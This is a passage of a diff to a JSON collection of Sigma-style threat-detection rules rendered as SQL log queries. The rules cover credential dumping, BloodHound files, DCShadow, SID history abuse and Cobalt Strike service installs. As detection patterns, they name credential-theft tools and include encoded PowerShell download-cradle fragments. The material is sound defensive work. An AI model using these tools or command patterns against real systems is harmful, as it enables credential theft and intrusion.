'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\JetBrains\\\\Toolbox\\\\bin\\\\7z.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\JetBrains\\\\apps\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_desktop_ini.yml" + "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" }, { - "title": "Cred Dump Tools Dropped Files", - "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", - "status": "test", - "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", - "author": "Teymur Kheirkhabarov, oscd.community", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.003", - "attack.t1003.004", - "attack.t1003.005" - ], + "title": "Password Protected ZIP File Opened (Suspicious Filenames)", + "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Legitimate used of encrypted ZIP files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" ], - "filename": "file_event_win_cred_dump_tools_dropped_files.yml" + "filename": "win_security_susp_opened_encrypted_zip_filename.yml" }, { - "title": "CVE-2021-26858 Exchange Exploitation", - "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", + "title": "Transferring Files with Credential Data via Network Shares", + "id": "910ab938-668b-401b-b08c-b596e80fdca5", "status": "test", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", - "author": "Bhabesh Raj", + "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26858" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.001", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Transferring sensitive files for legitimate administration work by legitimate administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%\\\\mimidrv%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\lsass%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\windows\\\\minidump\\\\%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\hiberfil%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sqldmpr%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sam%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\ntds.dit%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\security%' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2021_26858_msexchange.yml" + "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml" }, { - "title": "Creation of a Diagcab", - "id": "3d0ed417-3d94-4963-a562-4a92c940656a", + "title": "Password Protected ZIP File Opened", + "id": "00ba9da1-b510-4f6b-b258-8d338836180f", "status": "experimental", - "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", - "author": "frack113", - "tags": [ - "attack.resource_development" - ], + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate microsoft diagcab" + "Legitimate used of encrypted ZIP files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%.diagcab' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\') AND NOT (TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_diagcab.yml" + "filename": "win_security_susp_opened_encrypted_zip.yml" }, { - "title": "BloodHound Collection Files", - "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", - "status": "experimental", - "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", - "author": "C.J. May", + "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", + "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "status": "test", + "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", + "author": "James Pemberton / @4A616D6573", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1136.001", + "attack.t1136.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE '%\\_BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') OR (TargetFilename LIKE '%BloodHound%' ESCAPE '\\' AND TargetFilename LIKE '%.zip%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" ], - "filename": "file_event_win_bloodhound_collection.yml" + "filename": "win_security_susp_local_anon_logon_created.yml" }, { - "title": "Octopus Scanner Malware", - "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "title": "Suspicious Access to Sensitive File Extensions", + "id": "91c945bc-2ad1-4799-a591-4d00198a1215", "status": "test", - "description": "Detects Octopus Scanner Malware.", - "author": "NVISO", + "description": "Detects known sensitive file extensions accessed on a network share", + "author": "Samir Bousseaden", "tags": [ - "attack.t1195", - "attack.t1195.001" + "attack.collection", + "attack.t1039" ], "falsepositives": [ - "Unknown" + "Help Desk operator doing backup or re-imaging end user machine or backup software", + "Users working with these data types or exchanging message files" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%.pst' ESCAPE '\\' OR RelativeTargetName LIKE '%.ost' ESCAPE '\\' OR RelativeTargetName LIKE '%.msg' ESCAPE '\\' OR RelativeTargetName LIKE '%.nst' ESCAPE '\\' OR RelativeTargetName LIKE '%.oab' ESCAPE '\\' OR RelativeTargetName LIKE '%.edb' ESCAPE '\\' OR RelativeTargetName LIKE '%.nsf' ESCAPE '\\' OR RelativeTargetName LIKE '%.bak' ESCAPE '\\' OR RelativeTargetName LIKE '%.dmp' ESCAPE '\\' OR RelativeTargetName LIKE '%.kirbi' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\groups.xml' ESCAPE '\\' OR RelativeTargetName LIKE '%.rdp' ESCAPE '\\'))" ], - "filename": "file_event_win_mal_octopus_scanner.yml" + "filename": "win_security_susp_raccess_sensitive_fext.yml" }, { - "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File", - "id": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", + "title": "Potential Privileged System Service Operation - SeLoadDriverPrivilege", + "id": "f63508a0-c809-4435-b3be-ed819394d612", "status": "test", - "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", - "author": "Julia Fomina, oscd.community", + "description": "Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%WsmPty.xsl' ESCAPE '\\' OR TargetFilename LIKE '%WsmTxt.xsl' ESCAPE '\\') AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4673' AND PrivilegeList = 'SeLoadDriverPrivilege' AND Service = '-') AND NOT (((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\fltMC.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\HelpPane.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\mmc.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wimserv.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR ((ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft%' ESCAPE '\\')))" ], - "filename": "file_event_win_winrm_awl_bypass.yml" + "filename": "win_security_user_driver_loaded.yml" }, { - "title": "Suspicious File Created Via OneNote Application", - "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", + "title": "Possible DC Shadow Attack", + "id": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", "status": "experimental", - "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DCShadow via create new SPN", + "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1207" ], "falsepositives": [ - "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", - "Occasional FPs might occur if OneNote is used internally to share different embedded documents" + "Valid on domain controllers; exclude known DCs" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4742' AND ServicePrincipalNames LIKE '%GC/%' ESCAPE '\\') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'servicePrincipalName' AND AttributeValue LIKE 'GC/%' ESCAPE '\\')))" ], - "filename": "file_event_win_office_onenote_susp_dropped_files.yml" + "filename": "win_security_possible_dc_shadow.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", - "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", + "title": "DPAPI Domain Master Key Backup Attempt", + "id": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", "status": "test", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S", + "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.t1003.004" ], "falsepositives": [ - "Unlikely" + "If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. Which will trigger this event." ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4692')" ], - "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml" }, { - "title": "GoToAssist Temporary Installation Artefact", - "id": "5d756aee-ad3e-4306-ad95-cb1abec48de2", + "title": "Credential Dumping Tools Service Execution - Security", + "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Legitimate use" + "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\LogMeInInc\\\\GoToAssist Remote Support Expert\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "file_event_win_gotoopener_artefact.yml" + "filename": "win_security_mal_creddumper.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - File", - "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", + "title": "CobaltStrike Service Installations - Security", + "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "win_security_cobaltstrike_service_installs.yml" }, { - "title": "Unusual File Modification by dns.exe", - "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "title": "Invoke-Obfuscation Via Stdin - Security", + "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "status": "experimental", - "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" ], - "filename": "file_change_win_unusual_modification_by_dns_exe.yml" + "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" }, { - "title": "File Creation Date Changed to Another Year", - "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", - "status": "experimental", - "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "title": "Addition of SID History to Active Directory Object", + "id": "2632954e-db1c-49cb-9936-67d1ef1d17d2", + "status": "stable", + "description": "An attacker can use the SID history attribute to gain additional privileges.", + "author": "Thomas Patzke, @atc_project (improvements)", "tags": [ - "attack.t1070.006", - "attack.defense_evasion" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1134.005" ], "falsepositives": [ - "Changes made to or by the local NTP service" + "Migration of an account into a new domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4765', '4766') OR ((EventID = '4738' AND NOT ((SidHistory LIKE '-' ESCAPE '\\' OR SidHistory LIKE '\\%\\%1793' ESCAPE '\\'))) AND NOT (SidHistory = ''))))" ], - "filename": "file_change_win_2022_timestomping.yml" + "filename": "win_security_susp_add_sid_history.yml" }, { - "title": "Potential PrintNightmare Exploitation Attempt", - "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", - "status": "experimental", - "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", - "author": "Bhabesh Raj", + "title": "Protected Storage Service Access", + "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "status": "test", + "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" ], - "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" + "filename": "win_security_protected_storage_service_access.yml" }, { - "title": 